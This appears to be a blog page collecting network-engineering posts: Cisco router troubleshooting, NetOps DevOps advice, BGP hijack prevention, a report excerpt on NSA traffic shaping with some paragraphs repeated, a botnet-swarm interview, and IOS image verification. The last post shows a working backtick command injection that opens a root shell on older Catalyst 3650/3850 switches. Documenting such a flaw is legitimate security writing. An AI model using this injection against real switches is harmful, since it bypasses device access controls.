- associated bug: CSCvh27335
- multiple platforms affected, incl. the C800 and C180x series
- the same issue also appears on the Cisco ISR 2811
- changing the confreg value does not work from ROMMON or from the config
-------------------------------------------------------------------------------------------------
SOLUTION:
Change the console baud rate back to the default, which is 9600.
After the reload, the correct 0x2102 value shows up properly.
conf t
line con 0
speed 9600
do wr
do sh ver | s register
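The stuck 0x3922 value is explained by the console-speed bits inside the configuration register. A minimal sketch of checking those bits in Python follows; the bit positions (bits 11-12 plus the extension bit 5) are taken from Cisco's documented register layout, but treat the exact mapping as an assumption to verify for your platform:

```python
# Console-speed bits in the Cisco configuration register:
# bits 11-12 (0x1800) plus the extension bit 5 (0x0020).
# 0x2102 has all three clear -> default 9600-baud console.
BAUD_MASK = 0x1800 | 0x0020

def console_baud_is_default(confreg: int) -> bool:
    """True when the register encodes the default 9600-baud console speed."""
    return confreg & BAUD_MASK == 0

print(console_baud_is_default(0x2102))  # True
print(console_baud_is_default(0x3922))  # False -> non-default console speed
```

This also shows why setting `speed 9600` on `line con 0` clears the odd value: once the console speed is back at the default, the baud bits go to zero and the register can settle at 0x2102.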
-------------------------------------------------------------------------------------------------
MagLab-phys-R01(config-line)#do sh ver
Cisco IOS Software, C180X Software (C180X-ADVENTERPRISEK9-M), Version 15.1(4)M12a, RELEASE SOFTWARE (fc1)
ROM: System Bootstrap, Version 12.3(8r)YH13, RELEASE SOFTWARE (fc1)
R01 uptime is 3 hours, 25 minutes
System image file is "flash:c180x.bin"
Last reload type: Normal Reload
Cisco 1802 (MPC8500) processor (revision 0x200) with 589824K/65536K bytes of memory.
9 FastEthernet interfaces
1 ISDN Basic Rate interface
1 ATM interface
1 Virtual Private Network (VPN) Module
250880K bytes of ATA CompactFlash (Read/Write)
Configuration register is 0x3922 <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
MagLab-phys-R01#conf t
Enter configuration commands, one per line. End with CNTL/Z.
MagLab-phys-R01(config)#config-r
MagLab-phys-R01(config)#config-register 0x2102
MagLab-phys-R01(config)# do sh ver | s register
Configuration register is 0x3922
MagLab-phys-R01(config)#line con 0
MagLab-phys-R01(config-line)#speed 9600
MagLab-phys-R01(config-line)#do sh ver | s register
Configuration register is 0x3922 (will be 0x2102 at next reload)
MagLab-phys-R01(config-line)#
-------------------------------------------------------------------------------------------------
Wednesday, July 3, 2019
Mistakes when adopting DevOps for production network automation
If that sounds a lot like “DevOps is coming to a network near you,” then you have perfect pitch, because that’s exactly what’s going on inside enterprises around the globe.
We already have plenty of evidence, empirical and anecdotal, to indicate that use of automation and orchestration in production environments is not an anomaly. In fact, it appears to be accelerating as NetOps teams try to catch up to their DevOps counterparts.
The pressure to reach automated parity with app development environments can lead to skipping the strategy and going right for the tactical approach to adopting a more agile, automated means of making changes to the production pipeline.
That’s not a good thing. Production is not development, and the blast radius is significantly larger in production where there are hundreds -- sometimes thousands -- of applications and business processes relying on shared networking services. You can’t fail fast enough to avoid incurring damages when something goes wrong.
So as automation and orchestration become the norm in production environments, NetOps teams should be mindful of which DevOps practices they embrace and which they don’t. Because when bad habits are really hard to break, the best option is simply to avoid forming them in the first place.
To help you out, here are the top three bad habits you should avoid when adopting DevOps for production network automation and orchestration:
3 Bad Habits NetOps Should Avoid
1. Skipping the code review
The State of Code Review 2017 from SmartBear, a supplier of software-quality tools for teams, notes that 74% of developers participate in code reviews. That sounds good, until you realize that means the other 26% aren’t. Unsurprisingly, the No. 1 reason cited for not reviewing code at desired levels is workload.
This is how defects and bugs (excuse me, "undocumented features") creep into software. These are logic and security-based mistakes that can lead to crashes, outages, memory leaks, and even breaches. When you’re writing scripts, and integrating multiple services to automate and orchestrate a process, you are writing code. And if you are writing code, it needs to be reviewed by someone other than you.
Remember, this isn’t testing or QA where you can mess up and it doesn’t impact the business’ bottom line. This will be production, and a single mistake can lead to all sorts of problems. Make the time to conduct code reviews. The benefits are well-documented and include:
- increased quality of code with higher chance of identifying and eliminating security flaws
- knowledge sharing -- others learn the process along with the code
- compliance (ISO 9000/9001)
2. Using whatever language/tool/system you want
According to a 2016 survey conducted by Software Improvement Group and O’Reilly, 70% of respondents "believe that maintainability is the most important aspect of code to measure, even as compared to performance or security."
I hate PERL, and I’m not all that fond of Python. So I’m going to use node.js instead. Or maybe I’m just going to craft some incomprehensible command-line magic with sed, awk, and my friend grep to push this change to that router. Problem is, no one else uses node.js and that command line relies on my system-specific configuration.
That is not maintainable, and using “whatever language/tool/system” you want to build scripts and services to automate networking makes embracing code reviews really, really hard. It won’t go well for you. If no one else can maintain that code, it becomes yours. For life.
It’s like the goldfish you begged for when you were eight and now you’re stuck with it.
Standardizing on languages, tools, and systems early is important.
3. Ignoring security Rule Zero
Every AD&D (Advanced Dungeons & Dragons) player, at least all the ones I play with, knows about Rule Zero: “The Dungeon Master is the final arbiter of all rule decisions.” It supersedes all other rules in the game, hence the reason it is numbered as zero. In security, we also have a rule zero: “Thou shalt never trust user input. Ever.”
A number of high-profile outages were caused by ignoring this rule, because command-line parameters passed to any script are, by default, user input. Ignoring it may trigger a resume-generating event by accidentally causing an outage of extreme proportions.
Never trust user input implicitly.
Whether that’s the IP address of a wiring closet switch or a variable passed to inform a firewall script which port to open or close, don’t blindly execute on it. Instead, always validate input and, if necessary, force the human invoker of the script to verify the input. After all, they might not have meant to push that configuration change to every switch.
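As a minimal sketch of that advice, the snippet below validates an IP-address argument with Python's standard ipaddress module before any change would be pushed. The allow-list of management prefixes is hypothetical, purely for illustration:

```python
import ipaddress

# Hypothetical allow-list of management prefixes this script may touch.
ALLOWED_PREFIXES = [ipaddress.ip_network("10.10.0.0/16")]

def validate_target(raw: str) -> ipaddress.IPv4Address:
    """Reject anything that is not a well-formed, allow-listed IP address."""
    try:
        addr = ipaddress.ip_address(raw)
    except ValueError:
        raise SystemExit(f"refusing to run: {raw!r} is not an IP address")
    if not any(addr in net for net in ALLOWED_PREFIXES):
        raise SystemExit(f"refusing to run: {addr} is outside the allowed ranges")
    return addr

print(validate_target("10.10.3.7"))  # passes validation and prints 10.10.3.7
```

Calling `validate_target("not-an-ip")` or an address outside 10.10.0.0/16 aborts the script instead of blindly executing on the input.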
As you proceed with efforts to automate IT in 2018, pay close attention to the habits you’re forming. Avoiding these three bad habits will go a long way toward ensuring a successful and productive year.
Thursday, March 7, 2019
Cisco DevNet Express Security 2019, Prague
** Cisco DevNet Express ** Prague - 5-6.3.2019
- We created a simple automated workflow using different APIs.
- We identified the rogue endpoints where malware had executed in our network using AMP for Endpoints.
- We used ISE to quarantine these endpoints and contain the known threats.
- We used the AMP data to collect intelligence on the SHAs using Threat Grid.
- We built the list of IPs and domains associated with these SHAs from Threat Grid.
- We used Umbrella Investigate to gather intelligence on those domains and IPs.
- We used Umbrella Enforcement to contain the threat and prevent the malware from executing, as it can't call home.
- We used Firepower FDM APIs to enforce and contain the threat on the NextGen firewalls.
- We used the Python programming language to call the different APIs.
- We used Python to pull and push data between the different security systems - effectively creating one.
- We used Python to parse the JSON, XML, and YAML exchanged with the REST APIs.
- We learned how to gather intelligence and use it to quickly contain a threat and protect the rest of the network.
- DevOps practices are already needed in the security business and are coming fast to networking as well.
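A tiny sketch of the kind of glue code involved: pulling a JSON payload apart to collect the malicious file hashes before handing them to the next API. The payload shape below is invented for illustration, not the actual AMP or Threat Grid schema:

```python
import json

# Invented example payload; real AMP/Threat Grid responses differ.
payload = """
{
  "events": [
    {"host": "pc-17", "sha256": "aa11...", "disposition": "malicious"},
    {"host": "pc-42", "sha256": "bb22...", "disposition": "clean"},
    {"host": "pc-99", "sha256": "aa11...", "disposition": "malicious"}
  ]
}
"""

def malicious_shas(raw: str) -> set:
    """Collect the unique SHA-256 hashes flagged as malicious."""
    data = json.loads(raw)
    return {e["sha256"] for e in data["events"]
            if e["disposition"] == "malicious"}

print(sorted(malicious_shas(payload)))  # ['aa11...']
```

The same pattern repeats at every step of the workflow: call one API, extract the indicators, feed them to the next system.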
For one of the participants it was also a very happy day, as he gained not only knowledge but also a fully equipped Raspberry Pi 3B+!
It was my first reward from the CyberSecOps business :) And the fourth RPi in the collection :D
Friday, December 28, 2018
Professions are here for a reason
Thanks to Ivan Pepelnjak for the thoughts below. And many others as well!
An unused knob is sometimes better than a used one.
Professions are here for a reason – they enable people to do the work they’re qualified to do. Needless to say, it took him decades to fully understand its implications.
Do what you’re qualified to do. Don’t think you’re as good as me at everything just because you can Google-and-paste. Figure out where your limitations are.
Seek help when you’re dealing with something beyond your comfort zone. The amount of ignorant improvisation we see in IT is stupefying. Have you ever wondered why lawyers and doctors ask for second opinion?
Yes, I know your manager expects you to know everything just because you have administrator or engineer in your job title, which just proves he never thought about the next two paragraphs.
Don’t think you understand other people’s jobs. I’m always amazed to watch people completely unqualified to have an opinion on a problem loudly offering it just because they’re experts in a totally unrelated field. PhDs in chemistry telling IT engineers how to do their jobs would be one of my first-hand experiences.
Don’t think you could do their jobs better than they do… until you have tried and proved you can succeed while facing the same constraints they face. My favorite one: an airline pilot confident he could write a program to do an airline’s crew scheduling (which is probably an NP-hard problem) on a Commodore 64.
Having said all that, do your job well if you want to earn and retain the trust of your peers. If you’re obviously clueless or randomly throwing fixes at the problem trying to figure out which one might stick don’t be surprised when everyone else starts acting in ways I described above.
Accept help (courtesy of Chris Young). When a grey-beard gives you a piece of advice - LISTEN. Doesn’t mean you have to accept it as truth or obey their commands, but watching people new to the profession make the same mistakes we all made 20 years ago because they didn’t heed the warning is frustrating…
And “I told you so” doesn’t fix the network or the harm that major network outages cause to our reputation as a profession.
Saturday, December 8, 2018
BGP hijack prevention
- IRR Power Tools (IRRPT) https://github.com/6connect/irrpt
- Internet Routing Registry Toolset (IRRToolset) https://github.com/irrtoolset/irrtoolset
- BGPQ3 https://github.com/snar/bgpq3
- Ansible http://www.ansible.com/
- Cisco Network Services Orchestrator http://www.cisco.com/go/nso
- IRR Explorer http://irrexplorer.nlnog.net/
https://www.manrs.org
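Tools like BGPQ3 generate prefix filters from IRR data; the underlying check can be sketched in a few lines of Python with the standard ipaddress module. The allowed-prefix list below is a made-up stand-in for what an IRR query would return; real deployments should generate filters with the tools above:

```python
import ipaddress

# Made-up prefixes "registered" by a customer AS in an IRR (TEST-NET ranges).
ALLOWED = [ipaddress.ip_network(p) for p in ("192.0.2.0/24", "198.51.100.0/22")]

def announcement_ok(prefix: str, max_len: int = 24) -> bool:
    """Accept an announced prefix only if it sits inside a registered prefix
    and is not more specific than max_len (hijacks and leaks are often
    more-specific announcements)."""
    net = ipaddress.ip_network(prefix)
    if net.prefixlen > max_len:
        return False
    return any(net.subnet_of(allowed) for allowed in ALLOWED)

print(announcement_ok("198.51.100.0/23"))  # True  (inside a registered block)
print(announcement_ok("192.0.2.128/25"))   # False (too specific)
print(announcement_ok("203.0.113.0/24"))   # False (not registered)
```

This is the filtering logic that IRRPT/BGPQ3 automate at scale, emitting router-ready prefix-lists instead of Python booleans.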
---------------------------------
https://www.blackhat.com/presentations/bh-dc-09/Zmijewski/BlackHat-DC-09-Zmijewski-Defend-BGP-MITM.pdf
---------------------------------
all of the team members needed to be able to work creatively, independently and yet still in concert with each other, sometimes under circumstances of limited communications.
---------------------------------
International detours and routing changes happen automatically, without human intervention. Even so, they offer an opportunity to the NSA. With some exceptions, the surveillance of raw Internet traffic from foreign points of interception can be conducted entirely under the authority of the president.
Congressional and judicial limitations come into play only when that raw Internet traffic is used to “intentionally target a U.S. person,” a legal notion that is narrowly interpreted to exclude the bulk collection, storage, and even certain types of computerized data analysis.8
This is a crucial issue, because American data are routed across foreign communications cables. Several leading thinkers,9 including Jennifer Granick in her recent report for The Century Foundation, have drawn attention to the creeping risk of domestic surveillance that is conducted from afar.
This report describes a novel and more disturbing set of risks. As a technical matter, the NSA does not have to wait for domestic communications to naturally turn up abroad.
In fact, the agency has technical methods that can be used to deliberately reroute Internet communications. The NSA uses the term “traffic shaping” to describe any technical means that deliberately reroutes Internet traffic to a location that is better suited, operationally, to surveillance.
Since it is hard to intercept Yemen’s international communications from inside Yemen itself, the agency might try to “shape” the traffic so that it passes through friendly communications cables located on friendlier territory.10
Think of it as diverting part of a river to a location from which it is easier (or more legal) to catch fish.
The NSA has clandestine means of diverting portions of the river of Internet traffic that travels on global communications cables.
If, for example, the Federal Bureau of Investigation (FBI) wants to monitor electronic communications between two Americans as part of a criminal investigation, it is required by law to obtain a warrant.12
If the intelligence community wants to intercept Americans’ communications inside the United States, for national security reasons, then it must follow rules established by the Foreign Intelligence Surveillance Act (FISA).13
Meanwhile, when the intelligence community wants to intercept traffic abroad, its surveillance is mostly regulated by Executive Order 12333 (EO 12333),14 issued by Ronald Reagan in 1981.15
Surveillance programs conducted under FISA are subject to oversight by the FISA Court and regular review by the intelligence committees in Congress.
Meanwhile, surveillance programs under EO 12333 are largely unchecked by either the legislative16 or judicial branch. EO 12333 programs are conducted entirely under the authority of the president.
The narrow interpretation of “targeting” has significant implications on privacy for U.S. persons. For instance, the NSA has built a “search engine”44 that allows analysts to hunt through raw data collected in bulk through various means. If a human analyst uses that search engine to search for communications linked to a specific email address, Facebook username, or other personal identifier—a “selector”45—then that counts as “intentional targeting.”
However, if an analyst obtains information using search terms that do not implicate a single individual—for example, words or phrases such as “Yemen” or “nuclear proliferation”—the communications swept up as part of this search, such as an email between two Americans discussing current events in Yemen, are not considered to be “intentionally targeted.”46 Instead, these communications are merely “incidentally collected.”47
U.S. surveillance techniques are classified, which prevents outside observers from making categorical statements about how far the intelligence community stretches this notion of “incidental collection.”
But how do communications between two Americans typically travel abroad?
It can sometimes be faster or cheaper for Internet service providers (ISP) to send traffic through a foreign country. The United States has a well-connected communications infrastructure, so it is rare to find a case where traffic sent between two domestic computers naturally travels through a foreign country.
Nevertheless, these cases do occur. One such case (identified by Dyn Research’s Internet measurement infrastructure) is presented below (Figure 1).
The “traceroute” presented below shows how Internet traffic sent between two domestic computers travels through foreign territory. The traffic originates at a computer in San Jose and is routed through Frankfurt before arriving at its final destination in New York. The left column shows the Internet Protocol (IP) address of each Internet device on the route, the middle column names the Internet Service Provider (ISP) that owns this device, and the right column shows the location of the device.
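The three-column layout described above (IP address, ISP, location) is easy to post-process. A small sketch that flags the foreign hops in such a table follows; the rows are invented stand-ins for the figure's data, using TEST-NET placeholder addresses:

```python
# Invented rows standing in for the figure's traceroute table:
# (IP address, ISP, location).
HOPS = [
    ("192.0.2.1",    "ExampleNet", "San Jose, US"),
    ("203.0.113.9",  "TransitCo",  "Frankfurt, DE"),
    ("198.51.100.7", "ExampleNet", "New York, US"),
]

def foreign_hops(hops, home="US"):
    """Return the hops whose location lies outside the home country."""
    return [h for h in hops if not h[2].endswith(home)]

for ip, isp, loc in foreign_hops(HOPS):
    print(f"{ip:<14} {isp:<11} {loc}")   # prints only the Frankfurt hop
```

Spotting such detours in real traceroute output is exactly how measurement projects like Dyn's identify domestic traffic taking a foreign path.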

Replicating U.S.-based data in foreign data centers is a common industry practice, in order to ensure that data can be recovered even in the face of local disasters (power outages, earthquakes, and so on).53 Google, for instance, maintains data centers in the United States, Taiwan, Singapore, Chile, Ireland, the Netherlands, Finland, and Belgium, and its privacy policy states: “Google processes personal information on our servers in many countries around the world. We may process your personal information on a server located outside the country where you live.”54 If two Americans use their Google accounts to communicate, their emails and chat logs may be backed up on Google’s data centers abroad, and thus can be “incidentally collected” as part of EO 12333 surveillance.
The intelligence community does not have to hack into routers or use other clandestine techniques to shape traffic—it could simply ask the corporations that own those routers to provide access, or shape the traffic themselves. A document leaked by Edward Snowden suggests that the NSA has done this through its FAIRVIEW program.
(FAIRVIEW was revealed to be a code name for AT&T100). The document states:
There is no evidence that the FAIRVIEW program is being used to shape traffic from inside the United States to foreign communications cables. But it is worth noting that, with the cooperation of corporations such as AT&T, traffic could easily be shaped to a collection point abroad without the need to hack into any routers, thus obviating many of the legal questions previously discussed.
Modern networking protocols and technologies can be manipulated in order to shape Internet traffic from inside the United States toward tapped communications cables located abroad. It is possible that traffic shaping is regulated by EO 12333, and not by FISA,102 since the techniques shape traffic in bulk, in a way that does not “intentionally target” any specific individual or organization.
Moreover, while FISA covers the “acquisition” of Internet traffic on U.S. territory, the traffic shaping methods discussed merely move traffic around; they do not read, store, analyze, or otherwise “acquire” it. Instead, acquisition is performed on foreign soil, at the tapped communication cable. Finally, while the Fourth Amendment may require a warrant for hacking U.S. routers, the warrant requirement could be avoided by performing traffic shaping with the consent of corporations that own the routers (e.g. via the FAIRVIEW program), or by hacking foreign routers (and then using BGP manipulations).
While this approach sounds good in theory, in practice it is unlikely to work.
First, it is highly unlikely that we will ever have Internet infrastructure devices (e.g. routers) that cannot be hacked. Router software is complicated, and even the best attempt at an “unhackable” router is likely to contain bugs.104 Intelligence agencies have dedicated resources to finding and using these bugs to hack into routers.105 And even if we somehow manage to create bug-free router software, the intelligence community has been known to physically intercept routers as they ship in the mail, and tamper with their hardware.106
Second, it will take many years to develop and implement secure Internet protocols that prevent traffic shaping. A key challenge is that the Internet is a global system, one that transcends organizational and national boundaries. Deploying a secure Internet protocol requires cooperation from thousands of independent organizations in different nations. This is further complicated by the fact that many secure Internet protocols do not work well when they are used only by a small number of networks.107
Finally, while encryption can be used to hide the contents of Internet traffic, it does not hide metadata (that is, who is talking to whom, when they are talking, and for how long). Metadata is both incredibly revealing, and less protected by the law.108 Intelligence agencies have also dedicated resources toward compromising encryption.109 Moreover, EO 12333 allows the NSA to retain encrypted communications indefinitely.110 This is significant because the technology used to break encryption tends to improve over time—a message that was encrypted in the past could be decryptable in the future, as technology improves.111
This is not to say that technical solutions are unimportant. On the contrary, they are crucial, especially because they protect Americans’ traffic from snoopers, criminals, foreign intelligence services, and other entities that do not obey American laws. Nevertheless, technologies evolve at a rapid pace, so solving the problem using technology would be a continuous struggle.
It is much more sensible to realign the legal framework governing surveillance to encompass the technologies, capabilities, and practices of today and of the future.
Traffic Shaping by “Port Mirroring” at Hacked Routers
It has been reported that the NSA already employs a technique to “shape” traffic so that it travels through a tapped communication cable. The traffic-shaping technique involves hacking into an Internet infrastructure device, for example, a router. A router is a device that forwards Internet traffic to its destination.73 In Figure 3, which was hand-drawn by a hacker employed by the NSA and later leaked, the hacked device74 is called a “CNE midpoint.”75
“Electronic surveillance” is a legal term that is defined in the FISA statute; in fact, despite several amendments, FISA’s definition of “electronic surveillance” remains largely unchanged from its original 1978 version. The FISA definition of “electronic surveillance” has two clauses that could potentially cover hacking into a U.S. router and instructing it to perform traffic shaping via port mirroring.
One clause in the FISA statute defines “electronic surveillance” to be
the installation or use of an
electronic, mechanical, or other surveillance device in the United
States for monitoring to acquire information, other than from a wire or
radio communication, under circumstances in which a person has a
reasonable expectation of privacy and a warrant would be required for
law enforcement purposes.81
In other words, this clause covers the installation of a device in
the United States for surveillance. Hacking a U.S. router could
certainly be considered the installation of a device. However, a router
is a “wireline” device, and this clause does not cover devices that
acquire information from a “wire.”82 As such, this clause is not relevant to the discussion.
Another clause in the FISA statute defines “electronic surveillance” as
the acquisition by an electronic,
mechanical, or other surveillance device of the contents of any wire
communication to or from a person in the United States, without the
consent of any party thereto, if such acquisition occurs in the United
States, but does not include the acquisition of those communications of
computer trespassers that would be permissible under section 2511(2)(i)
of title 18, United States Code.83
This clause covers the “acquisition” of communications inside the United States. However, one could argue that communications are not “acquired” when a U.S. router is hacked and instructed to perform port mirroring. The hacked router is merely instructed to copy traffic and pass it along, but not to read, store, or analyze it. Therefore, “acquisition” occurs at the tapped communication cable (abroad) rather than at the hacked router (inside the United States). As such, this clause is also not relevant.84
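For concreteness, the port-mirroring step itself is an ordinary, documented router feature, not an exotic capability. On a Cisco Catalyst switch, a local SPAN session that copies all traffic seen on one port out another looks roughly like this (a sketch only; the interface names are placeholders, and remote variants such as RSPAN/ERSPAN can carry the mirrored copy across the network toward a distant tap):

```
! Sketch: mirror everything seen on Gi0/1 out of Gi0/2,
! where a monitoring device (or an onward link) is attached.
monitor session 1 source interface GigabitEthernet0/1 both
monitor session 1 destination interface GigabitEthernet0/2
```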
The intelligence community does not have to hack into routers or use other clandestine techniques to shape traffic—it could simply ask the corporations that own those routers to provide access, or shape the traffic themselves. A document leaked by Edward Snowden suggests that the NSA has done this through its FAIRVIEW program.
(FAIRVIEW was revealed to be a code name for AT&T100). The document states:
FAIRVIEW—Corp partner since 1985 with
access to int[ernational] cables, routers, and switches. The partner
operates in the U.S., but has access to information that transits the
nation and through its corporate relationships provide unique access to
other telecoms and ISPs. Aggressively involved in shaping traffic to run
signals of interest past our monitors.101
There is no evidence that the FAIRVIEW program is being used to shape traffic from inside the United States to foreign communications cables. But it is worth noting that, with the cooperation of corporations such as AT&T, traffic could easily be shaped to a collection point abroad without the need to hack into any routers, thus obviating many of the legal questions previously discussed.
Modern networking protocols and technologies can be manipulated in order to shape Internet traffic from inside the United States toward tapped communications cables located abroad. It is possible that traffic shaping is regulated by EO 12333, and not by FISA,102 since the techniques shape traffic in bulk, in a way that does not “intentionally target” any specific individual or organization.
Moreover, while FISA covers the “acquisition” of Internet traffic on U.S. territory, the traffic-shaping methods discussed merely move traffic around; they do not read, store, analyze, or otherwise “acquire” it. Instead, acquisition is performed on foreign soil, at the tapped communication cable. Finally, while the Fourth Amendment may require a warrant for hacking U.S. routers, the warrant requirement could be avoided by performing traffic shaping with the consent of the corporations that own the routers (e.g., via the FAIRVIEW program), or by hacking foreign routers (and then using BGP manipulations).
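The “BGP manipulations” referred to here rest on a well-known property of interdomain routing: routers prefer the most specific matching route, so whoever announces a more specific prefix attracts that traffic. A hedged sketch in Cisco-style configuration (the AS number and prefix are invented for illustration):

```
! Hypothetical: the legitimate origin announces 203.0.113.0/24;
! a router in AS 64501 announces the more-specific 203.0.113.0/25
! and thereby pulls traffic for that half of the block toward itself.
router bgp 64501
 network 203.0.113.0 mask 255.255.255.128
```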
Technical Solutions Will Not Work
One might be tempted to eliminate these loopholes via technical solutions. For instance, traffic shaping could be made more difficult by designing routers that are “unhackable,” and Internet protocols could be made secure against traffic-shaping manipulations. Or the confidentiality of traffic could be protected simply by encrypting everything. While this approach sounds good in theory, in practice it is unlikely to work.
First, it is highly unlikely that we will ever have Internet infrastructure devices (e.g. routers) that cannot be hacked. Router software is complicated, and even the best attempt at an “unhackable” router is likely to contain bugs.104 Intelligence agencies have dedicated resources to finding and using these bugs to hack into routers.105 And even if we somehow manage to create bug-free router software, the intelligence community has been known to physically intercept routers as they ship in the mail, and tamper with their hardware.106
Second, it will take many years to develop and implement secure Internet protocols that prevent traffic shaping. A key challenge is that the Internet is a global system, one that transcends organizational and national boundaries. Deploying a secure Internet protocol requires cooperation from thousands of independent organizations in different nations. This is further complicated by the fact that many secure Internet protocols do not work well when they are used only by a small number of networks.107
Finally, while encryption can be used to hide the contents of Internet traffic, it does not hide metadata (that is, who is talking to whom, when they are talking, and for how long). Metadata is both incredibly revealing, and less protected by the law.108 Intelligence agencies have also dedicated resources toward compromising encryption.109 Moreover, EO 12333 allows the NSA to retain encrypted communications indefinitely.110 This is significant because the technology used to break encryption tends to improve over time—a message that was encrypted in the past could be decryptable in the future, as technology improves.111
This is not to say that technical solutions are unimportant. On the contrary, they are crucial, especially because they protect Americans' traffic from snoopers, criminals, foreign intelligence services, and other entities that do not obey American laws. Nevertheless, technologies evolve at a rapid pace, so solving the problem using technology would be a continuous struggle.
It is much more sensible to realign the legal framework governing surveillance to encompass the technologies, capabilities, and practices of today and of the future.
Friday, November 30, 2018
AI and CDN used in Network Exploitation & Attacks (Pt.3)
Working together toward a common goal - attacking networks - that is the task of an intelligent botnet: able to share information on vulnerabilities and hosts, and to quickly change strategy without a bot-herder.
[https://threatpost.com/newsmaker-interview-derek-manky-on-self-organizing-botnet-swarms/136936/]
For over five years Derek Manky, global security strategist at Fortinet and FortiGuard Labs, has been helping the private and public sectors identify and fight cybercrime. His job also includes working with noted groups: Computer Emergency Response Teams, the NATO NICP, the INTERPOL Expert Working Group and the Cyber Threat Alliance.
Recently Threatpost caught up with Manky to discuss the latest developments around his research on botnet “swarm intelligence.” That’s a technique where criminals enlist artificial intelligence (AI) inside botnet nodes. Those nodes are then programmed to work toward a common goal of bolstering an attack chain and accelerating the time it takes to breach an organization.

Threatpost: What are “self-organized botnet swarms?”
Manky: What we are starting to see [are] humans, such as the black-hat hackers, being taken out of the attack cycle more and more. Why? Because humans are slow by nature compared to machines.
Swarms accelerate the attack chain – or attack cycle. They help attackers move fast. Over time, as defenses improve, the window of time for an attack is shrinking. This is a way for attackers to make up for that lost time.
A self-learning swarm is a cluster of compromised devices that leverage peer-based AI to target vulnerable systems. Traditional botnets wait for commands from a bot herder. Swarms are able to make decisions independently. They can identify and assault – or swarm – different attack vectors all at once.
TP: What type of botnets are we talking about here? Botnets used for crippling a network? Where is this technology seen today?
Manky: Hide and Seek is a recent botnet that we have seen with the swarm technology in it.
TP: So, what makes Hide and Seek unique?
Manky: Typically a botnet will receive a command from the attacker, right? They go DDoS the target or try to exfiltrate information. But what we are starting to see with these new peer-to-peer botnets is they are able to share those commands – between botnet nodes – and act on their own without an attacker issuing any commands.
TP: Is this machine intelligence? And, what is it that these botnets are trying to learn from and execute?
Manky: They are collecting data. They are trying to learn information about potential attack targets – that is, exploits and weaknesses that they can launch a successful attack against. They are trying to pinpoint vulnerabilities or holes that they can actually go and launch a successful exploit against. They are looking for a penetration weakness – something they can send payload to. Once they find it, the node can let the rest of the botnet nodes know.
TP: Can you break this down into a likely scenario?
Manky: We’re starting to see this in the world of IoT. A hypothetical situation includes a network where there is a barrier – a network firewall, or policies. On the network is a printer, network attached storage, an IP security camera and a database. Then, for whatever reason, the IP security camera is on the same network segment as database. Now [the attack] can target the printer and infect the network attached storage, which infects the camera. Now the camera can be used as a proxy to gather intelligence.
That intelligence is shared between the nodes. It’s a structured command list where it can say “send me a list of targets that you know, have this within the network segment – along with intelligence on that segment.” And then – when the network configurations match – the nodes can swarm and request the exfiltration of data and launch more attacks.
TP: Is there anything that is unique about the size or agility of these botnets? Does this “intelligence” allow it to be more efficient and smaller?
Manky: Swarms are large by nature. But I would call them first, efficient. Traditional botnets are monolithic. Bot-herders typically rent a botnet out just to [launch] a DDoS attack or just to launch a phishing attack. But with swarms, they have the capability to spin up resources – similar to virtual machines.
Bot-herders can say, “I want 20 percent of this botnet doing DDoS. I want 30 percent doing phishing campaigns.” It’s more about monetization, efficiency and being fast.
TP: When you say “swarms,” can you give me a sense of what you exactly mean by that?
Manky: The best example is what we see in nature – such as birds, bees and ants. When ants communicate they use pheromones between each other. The pheromones mark the shortest path to bring back food to the nest. Ants, in this scenario, aren’t taking orders from the queen ant. They are acting on their own.
Now the same concept is being applied to botnet code. What we are seeing are precursors of this right now. Hide and Seek has the code, but isn’t using it yet.
Hide and Seek is a decentralized IoT botnet. The capabilities are in the code, but we are still waiting for the first full-blown attack using this technique.
I expect to see a lot more of this technology in 2019.
TP: Where does that leave us on the defense side of the equation?
Manky: It really needs to redefine the network security center. We are going to need more automated tools. It’s going to come down to AI versus AI. We need better security postures that are capable of actually detecting and acting on their own as well.
If you are up against a swarm, it's very fast by nature. It can breach a target before a human administrator can even detect it. For that reason, the network intelligence needs to be able to understand what it is seeing and be able to act on it.
At a higher level, it comes down to quality of intelligence and how much you trust your
IOS image verification - running + saved
Verify the authenticity and integrity of the binary file by using the show software authenticity file command. In the following example, taken from a Cisco 1900 Series Router, the command is used to verify the authenticity of c1900-universalk9-mz.SPA.152-4.M2.bin on the system:

Router# show software authenticity file c1900-universalk9-mz.SPA.152-4.M2
File Name                   : c1900-universalk9-mz.SPA.152-4.M2
Image type                  : Production
  Signer Information
    Common Name             : CiscoSystems
    Organization Unit       : C1900
    Organization Name       : CiscoSystems
  Certificate Serial Number : 509AC949
  Hash Algorithm            : SHA512
  Signature Algorithm       : 2048-bit RSA
  Key Version               : A

In addition, administrators can use the show software authenticity running command to verify the authenticity of the image that is currently booted and in use on the device. Administrators should verify that the Certificate Serial Number value matches the value obtained by using show software authenticity file on the binary file. The following example shows the output of show software authenticity running on the same router; note that the Certificate Serial Number value, 509AC949, matches the one obtained in the previous example.

Router# show software authenticity running
SYSTEM IMAGE
------------
Image type                  : Production
  Signer Information
    Common Name             : CiscoSystems
    Organization Unit       : C1900
    Organization Name       : CiscoSystems
  Certificate Serial Number : 509AC949
  Hash Algorithm            : SHA512
  Signature Algorithm       : 2048-bit RSA
  Key Version               : A
Verifier Information
  Verifier Name             : ROMMON 1
  Verifier Version          : System Bootstrap, Version 15.0(1r)M9, RELEASE SOFTWARE (fc1)
Technical Support: http://www.cisco.com/techsupport
Cisco IOS-XE - Request Platform System Shell
Verifying Authenticity for Digitally Signed Images
Older Catalyst 3650 & 3850 switches vulnerability:
[code]
Catalyst-3650#request system shell
Activity within this shell can jeopardize the functioning of the system.
Are you sure you want to continue? [y/n] y
Challenge: 94d5c01766c7a0a29c8c59fec3ab992[..]
Please enter the shell access response based on the
above challenge (Press "Enter" when done or to quit.):
/bin/sh
Key verification failed
Activity within this shell can jeopardize the functioning of the system.
Are you sure you want to continue? [y/n] y
Challenge: 94d5c01766c7a0a29c8c59fec3ab992[..]
Please enter the shell access response based on the
above challenge (Press "Enter" when done or to quit.):
/bin/sh
Key verification failed
[/code]
Workaround:
[code]
Please enter the shell access response based on the above challenge
(Press "Enter" when done or to quit.):
`bash 1>&2`
(Press "Enter" when done or to quit.):
`bash 1>&2`
[/code]
No input validation ==> backticks in the response are evaluated by the shell
[code]
Please enter the shell access response based on the above challenge
(Press "Enter" when done or to quit.):
`reboot`
SecureShell: SecureShell [debug]Key verification failed
Switch#
Unmounting ng3k filesystems...
Unmounted /dev/sda3...
Warning! - some ng3k filesystems may not have unmounted cleanly...
Please stand by while rebooting the system...
Restarting system.
Booting...Initializing RAM +++++++@@@@@@@@...++++++++
[/code]
